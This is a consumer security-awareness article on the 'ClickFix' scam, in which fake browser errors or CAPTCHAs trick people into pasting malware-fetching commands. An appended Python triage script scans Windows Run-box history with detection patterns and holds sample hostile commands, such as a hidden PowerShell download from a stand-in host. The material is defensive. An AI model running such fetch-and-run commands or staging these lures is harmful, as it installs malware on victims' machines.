The term “ClickFix” was coined by Proofpoint researchers and first publicly used in their November 18, 2024, blog post analyzing social engineering attacks observed since March 2024.
Many online attacks don’t break into your computer — they try to persuade you to break into it yourself.
That’s exactly what a tactic called ClickFix does.
ClickFix is a scam technique where criminals create fake error messages on websites to trick you into copying and pasting a command into your computer. When you run that command, it secretly downloads malware.
Instead of looking scary, these messages usually look official and helpful, which is why they work.
Common tricks you might see
ClickFix messages often pretend to be things you recognise, such as:
- A message saying you need to refresh or update your browser to view a page.
- A fake alert claiming you’re missing a plugin to open a PDF or Word document.
- A fake security check or CAPTCHA, designed to look like Cloudflare or Google.
- Fake error screens that imitate:
  - Chrome’s “Aw, Snap!” crash page
  - Microsoft Word extension problems
- Messages telling you to run a command to access a Discord server.
In every case, the pattern is the same:
A fake problem is shown, and you are told to “fix it” by running a command.
Appearing ON a website
The simple rule to stay safe
If a website ever tells you to:
- press Windows + R,
- open PowerShell (Windows) or Terminal (Mac), or
- copy and paste a command from a webpage,
stop immediately. Close the page. Do not run it.
Legitimate websites never require you to run commands just to view content.
If you’ve already run one of these commands and you’re worried, contact me.
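For whoever ends up checking a machine after such a report: Windows keeps the commands typed into the Windows + R box in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The sketch below is an added example, not part of the original article, that sorts exported entries from that history into "looks normal" and "needs a human look". The signal patterns and the sample entries are assumptions constructed for illustration.

```python
import re

# Heuristic signals. These patterns are assumptions chosen for this example,
# not a complete or authoritative signature set.
SIGNALS = {
    "script_host": re.compile(
        r"\b(powershell|pwsh|cmd|mshta|wscript|cscript)(\.exe)?\b", re.I),
    "remote_fetch": re.compile(
        r"https?://|\b(curl|wget|iwr|irm|invoke-webrequest|bitsadmin)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "lure_text": re.compile(r"captcha|not a robot|verification|cloudflare", re.I),
}


def clean_entry(raw):
    """RunMRU values end with a literal backslash-1 marker; strip it."""
    return raw[:-2] if raw.endswith("\\1") else raw


def triage(raw):
    """Return (command, matched signal names, needs_review)."""
    cmd = clean_entry(raw).strip()
    hits = [name for name, rx in SIGNALS.items() if rx.search(cmd)]
    # A script host alone is normal ("cmd"); a script host combined with a
    # download, a hidden window or reassuring lure text is worth a human look.
    needs_review = "script_host" in hits and len(hits) >= 2
    return cmd, hits, needs_review


# Constructed sample entries (not real data); example.invalid never resolves.
SAMPLE_RUN_HISTORY = [
    "notepad\\1",
    "\\\\fileserver\\reports\\1",
    "cmd\\1",
    'powershell -w hidden -c "iwr https://example.invalid/fix ..." '
    "# I am not a robot - verification ID 0000\\1",
    "mshta https://example.invalid/check # Cloudflare check\\1",
]


def review_list(entries):
    """Commands from the history that a responder should inspect."""
    return [cmd for cmd, _, flag in map(triage, entries) if flag]


if __name__ == "__main__":
    for raw in SAMPLE_RUN_HISTORY:
        cmd, hits, flag = triage(raw)
        print("REVIEW" if flag else "ok    ", hits, cmd)
```

Only commands entered through the Windows + R box land in this history; a command pasted straight into an already open PowerShell or Terminal window will not appear there.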
